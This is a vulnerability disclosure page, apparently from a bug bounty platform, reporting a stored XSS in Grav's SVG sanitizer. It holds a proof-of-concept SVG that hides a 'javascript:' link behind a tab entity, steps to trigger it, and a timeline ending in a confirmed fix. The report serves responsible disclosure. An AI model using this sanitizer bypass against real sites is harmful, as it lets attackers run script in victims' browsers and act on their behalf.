Cross-site Scripting (XSS) - Stored in getgrav/grav

Valid

Reported on

Mar 1st 2022


Description

SVG sanitizer cloud be bypassed via flowing SVG file that leads to stored XSS

Proof of Concept

<?xml version="1.0" standalone="no"?>
<svg viewBox="0 0 100 100" xmlns="http://www.w3.org/2000/svg">
  <a href="javascript&#9;:alert(document.domain)">
    <circle cx="0" cy="0" r="300"/>
  </a>
</svg>

Upload the above SVG file in your profile, view it, and click anywhere on the page then XSS will be triggered : Deepin-Screenshot-select-area-20220301125616.png

Impact

This vulnerability is capable of performing arbitrary actions on behalf of victims at the client side.

We are processing your report and will contact the getgrav/grav team within 24 hours. 3 months ago
We have contacted a member of the getgrav/grav team and are waiting to hear back 3 months ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. 3 months ago
Anna
3 months ago

Researcher


Any Update ?

We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 3 months ago
Anna
2 months ago

Researcher


Any Update?

Djamil Legato validated this vulnerability 2 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Djamil Legato confirmed that a fix has been merged on f19297 2 months ago
Djamil Legato has been awarded the fix bounty
Djamil Legato
2 months ago

Maintainer


Thank you, we have a fix for this

to join this conversation